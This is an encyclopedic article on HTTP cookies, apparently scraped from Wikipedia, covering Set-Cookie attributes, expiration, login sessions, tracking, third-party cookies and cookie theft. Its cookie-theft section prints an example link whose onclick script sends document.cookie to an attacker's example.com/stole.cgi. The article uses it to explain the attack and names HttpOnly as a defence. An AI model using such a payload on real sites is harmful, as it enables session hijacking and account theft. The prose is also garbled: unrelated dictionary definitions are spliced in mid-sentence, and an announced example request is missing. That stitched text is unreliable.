The line Set-cookie is only sent if the server wishes the browser to store a cookie. Set-cookie is a request for the browser to store the string name=value and send it back in all future requests to the server. If the browser supports cookies and cookies are enabled, every subsequent page request to the same server contains the cookie. For example, the browser requests the page http://www. example. org/spec. html by sending the server www. example. org a request like the following:

This is a request for another page from the same server, and differs from the first one above because it contains the string that the server has previously sent to the browser. This way, the server knows that this request is related to the previous one. The server answers by sending the requested page, possibly adding other cookies as well.

The value of a cookie can be modified by the server by sending a new Set-Cookie: name=newvalue line in response of a page request. The browser then replaces the old value with the new one.

The term "cookie crumb" is sometimes used to refer to the name-value pair. ^[27] This is not the same as breadcrumb web navigation, which is the technique of showing in each page the list of pages the user has previously visited; this technique may however be implemented using cookies. Breadcrumbs or breadcrumb trail are a navigation technique used in User interfaces Its purpose is to give users a way to keep track of their location within programs

The Set-Cookie line is typically not created by the HTTP server itself but by a CGI program. The Common Gateway Interface ( CGI) is a standard protocol for interfacing external Application software with an information server The HTTP server only sends the result of the program (a document preceded by the header containing the cookies) to the browser.

Cookies can also be set by JavaScript or similar scripts running within the browser. In JavaScript, the object document. cookie is used for this purpose. For example, the instruction document. cookie = "temperature=20" creates a cookie of name temperature and value 20. ^[28]

Cookie attributes

Beside the name/value pair, a cookie may also contain an expiration date, a path, a domain name, and whether the cookie is intended only for encrypted connections. A path is the general form of a file or directory name giving a file's name and its unique location in a File system. In Computer networking, a domain name is a name given to a collection of network devices that belong to a domain which is an administrative space managed according Transport Layer Security ( TLS) and its predecessor Secure Sockets Layer ( SSL) are Cryptographic protocols that provide secure RFC 2965 also specifies that cookies must have a mandatory version number, but this is usually omitted. These pieces of data follow the name=newvalue pair and are separated by semicolons. For example, a cookie can be created by the server by sending a line Set-Cookie: name=newvalue; expires=date; path=/; domain=. example. org.

Example of an HTTP response from google.com, which sets a cookie with attributes. Google Inc is an American public corporation, earning revenue from advertising related to its Internet search, e-mail, online

The domain and path tell the browser that the cookie has to be sent back to the server when requesting URLs of a given domain and path. If not specified, they default to the domain and path of the object that was requested. As a result, the domain and path strings may tell the browser to send the cookie when it normally would not. For security reasons, the cookie is accepted only if the server is a member of the domain specified by the domain string.

Cookies are actually identified by the triple name/domain/path, not only the name (the original Netscape specification considers only the pair name/path). In other words, same name but different domains or paths identify different cookies with possibly different values. As a result, cookie values are changed only if a new value is given for the same name, domain, and path.

The expiration date tells the browser when to delete the cookie. If no expiration date is provided, the cookie is deleted at the end of the user session, that is, when the user quits the browser. As a result, specifying an expiration date is a means for making cookies to survive across browser sessions. For this reason, cookies that have an expiration date are called persistent.

The expiration date is specified in the "Wdy, DD-Mon-YYYY HH:MM:SS GMT" format. Greenwich Mean Time ( GMT) is a term originally referring to mean solar time at the Royal Observatory in Greenwich, London As an example, the following is a cookie sent by a Web server (the value string has been changed):

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=. example. net

The name of this particular cookie is RMID, while its value is the string 732423sdfs73242. The server can use an arbitrary string as the value of a cookie. The server may collapse the value of a number of variables in a single string, like for example a=12&b=abcd&c=32. The path and domain strings / and . example. net tell the browser to send the cookie when requesting an arbitrary page of the domain . example. net, with an arbitrary path.

Expiration

Cookies expire, and are therefore not sent by the browser to the server, under any of these conditions:

1. At the end of the user session (i. e. when the browser is shut down) if the cookie is not persistent
2. An expiration date has been specified, and has passed
3. The expiration date of the cookie is changed (by the server or the script) to a date in the past
4. The browser deletes the cookie by user request

The third condition allows a server or script to explicitly delete a cookie. Note that the browser doesn't send to the server information about cookie lifetime, so there is no way for the server to check if the cookie expires soon.

Authentication

Cookies can be used by a server to recognize previously-authenticated users and to personalize the web pages of a site depending on the preferences of a user. Authentication (from Greek αυθεντικός real or genuine from authentes author is the act of establishing or confirming something (or someone as This can be done for example as follows:

1. The user inserts username and password in the text fields of a login page and sends them to the server;
2. The server receives username and password and checks them; if correct, it sends back a page confirming that login has been successful together with a cookie containing with a random session ID that coincides with a session stored in a database. This cookie is usually made valid for only the current browser session, however it may also be set to expire at a future date. The random session ID is then provided on future visits and provides a way for the server to uniquely identify the browser and that the browser already has an authenticated user.
3. Every time the user requests a page from the server, the browser automatically sends the cookie back to the server; the server compares the cookie with the stored ones; if a match is found, the server knows which user has requested that page.

This is the method commonly used by many sites that allow logging in, such as Yahoo!, Wikipedia, and Facebook. ***************************************************************************************** * * Facebook is a social networking Website launched on February 4 2004 (See "Cookie Theft" and "Cookie Expiration" sections of this article for security concerns around this mechanism)

Personalization

Cookies can be used for allowing users to express preferences about a Web site. For example, the Google search engine allows the user to choose how many results are to be shown for every query, and this choice is maintained across sessions. Google Inc is an American public corporation, earning revenue from advertising related to its Internet search, e-mail, online

If a user was authenticated using the technique above, when they request a page the server is also sent the cookie associated with the user. It can therefore adapt the requested page to the stored user preferences. When authentication is not used, the user preferences are stored in a cookie. Users select their preferences by entering them in a Web form and submitting it to the server. The server encodes them in a cookie and sends it back to the browser. This way, every time the user accesses a page, the server is also sent the cookie where the preferences are stored, and can personalise the page according to the user preferences.

For example, Google stores the user preferences in a cookie of name PREF. This cookie is created with default values when the user accesses the site for the first time. For example, the cookie value contains the string NR=10, that indicates a default preference of ten hits displayed in each page. If the user changes this number to 20 in the preference page, the server modifies the cookie with NR=20. Every time the user queries the search engine, the cookie is sent to the server along with the query. This way, the server knows how many hits should be shown in each page.

Tracking

Cookies can also be used for tracking the path of a user while visiting the web pages of a site. This can also be done in part by using the IP address of the computer requesting the page or the referer field of the HTTP header, but cookies allows for a greater precision. An Internet Protocol ( IP) address is a numerical identification ( Logical address) that is assigned to devices participating in a Computer network The referer, or HTTP referer, identifies from the point of view of an Internet Webpage or resource the address of the webpage (commonly the URL Hypertext Transfer Protocol ( HTTP) is a Communications protocol for the transfer of information on the Internet. This can be done for example as follows:

1. If the user requests a page of the site, but the request contains no cookie, the server presumes that this is the first page visited by the user; the server creates a random string and sends it as a cookie back to the browser together with the requested page;
2. From this point on, the cookie will be automatically sent by the browser to the server every time a new page from the site is requested; the server sends the page as usual, but also stores the URL of the requested page along with the date/time and the cookie in a log file.

By looking at the log file, it is then possible to find out which pages, and in which sequence, the user has visited. For example, if the log contains some requests done using the cookie id=dfhsiw, these requests all come from the same user. The URL and time/date stored with the cookie allows finding out which pages the user has visited, and at which time.

Third-party cookies

Images or other objects contained in a Web page may reside in servers different from the one holding the page. In order to show such a page, the browser downloads all these objects, possibly receiving cookies. These cookies are called third-party cookies if the server sending them is located outside the domain of the Web page.

This condition is common with on-line advertisement. Indeed, web banners are typically stored in servers of the advertising company, which are not in the domain of the Web pages showing them. A web banner or banner ad is a form of Advertising on the World Wide Web. If third-party cookies are not rejected by the browser, an advertising company can track a user across the sites where it has placed a banner. In particular, whenever a user views a page containing a banner, the browser retrieves the banner from a server of the advertising company. If this server has previously set a cookie, the browser sends it back, allowing the advertising company to link this access with the previous one. By choosing a unique banner URL for every Web page where it is placed or by using the HTTP referer field, the advertising company can then find out which pages the user has viewed. The referer, or HTTP referer, identifies from the point of view of an Internet Webpage or resource the address of the webpage (commonly the URL The same technique can be used with web bugs. A Web bug is an object that is embedded in a Web page or E-mail and is usually invisible to the user but allows checking that a user has viewed the page or e-mail These, unlike the obvious banners, are images embedded in the Web page that are undetectable by the user (e. g. they are tiny and/or transparent)

Third-party cookies are used to create an anonymous profile of the user. This allows the advertising company to select the banner to show to a user based on the user's profile. The advertising industry has denied any other use of these profiles.

Many modern browsers, such as Mozilla Firefox, Internet Explorer and Opera block third party cookies if requested by the user. Windows Internet Explorer (formerly Microsoft Internet Explorer abbreviated MSIE) commonly abbreviated to IE, is a series of graphical Opera is a Web browser and Internet suite developed by the Opera Software company Internet Explorer version 6 allows a mild form of blocking, called leashing. A leashed cookie is a third-party cookie that is sent by the browser only when accessing a third-party document via the same first-party. For example, if third. com sets a cookie when an image is requested, and this cookie is set for the first time when the user views a document from first. com, the same cookie is not sent if the user downloads a document that contains the same image but the document is on another site other. com, if the cookie is leashed. A leashed cookie is different from a blocked cookie in that it is sent, in this example, if the image is contained in another document from the same site first. com. ^[29]

Basket

Some online shopping sites allow a user, even when not logged in, to store a number of items in a "virtual basket". The user starts navigating the site with an empty basket, and can add items to the basket while visiting the site. The list of items the user has chosen can be stored using cookies. For example, the server sends an empty cookie to the browser when the user visits the first page; whenever the user adds an item to the basket, the server adds the name of the item to the cookie.

This is a very insecure mechanism, because a malicious user can alter the cookie; a much more secure mechanism is to generate a random cookie as under "tracking", and using that as a lookup key in a database stored on the server.

Cookie theft

The cookie specifications constrain cookies to be sent back only to the servers in the same domain as the server from which they originate. However, the value of cookies can be sent to other servers using means different from the Cookie header.

In particular, scripting languages such as JavaScript and JScript are usually allowed access to cookie values and have some means to send arbitrary values to arbitrary servers on the Internet. JavaScript is a Scripting language most often used for Client-side web development JScript is the Microsoft dialect of the ECMAScript Scripting language specification These facts are used in combination with sites allowing users to post HTML content that other users can see.

As an example, an attacker running the domain example. com may post a comment containing the following link to a popular blog they do not otherwise control:

<a href="#" onclick="window. location='http://example. com/stole. cgi?text='+escape(document. cookie); return false;">Click here!</a>

When another user clicks on this link, the browser executes the piece of code within the onclick attribute, thus replacing the string document. cookie with the list of cookies of the user that are active for the page. As a result, this list of cookies is sent to the example. com server, and the attacker is then able to collect the cookies of other users.

This type of attack is difficult to detect on the user side, since the script is coming from the same domain that has set the cookie, and the operation of sending the value appears to be authorised by this domain. It is usually considered the responsibility of the administrators running sites where users can post to disallow the posting of such malicious code.

Cookies are not visible to client-side programs such as JavaScript if they have been sent with the HttpOnly flag. From the point of view of the server, the only difference with respect of the normal case is that the set-cookie header line is added a new field containing the string `HttpOnly':

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=. example. net; HttpOnly

When the browser receives such a cookie, it is supposed to use it as usual in the following HTTP exchanges, but not to make it visible to client-side scripts. ^[30] The `HttpOnly` flag is not part of any standard, and is not implemented in all common browsers.

References

This article was originally based on material from the Free On-line Dictionary of Computing, which is licensed under the GFDL. The Free On-line Dictionary of Computing ( FOLDOC) is an online searchable encyclopedic Dictionary of Computing subjects The GNU Free Documentation License ( GNU FDL or simply GFDL) is a Copyleft License for free documentation designed by the Free Software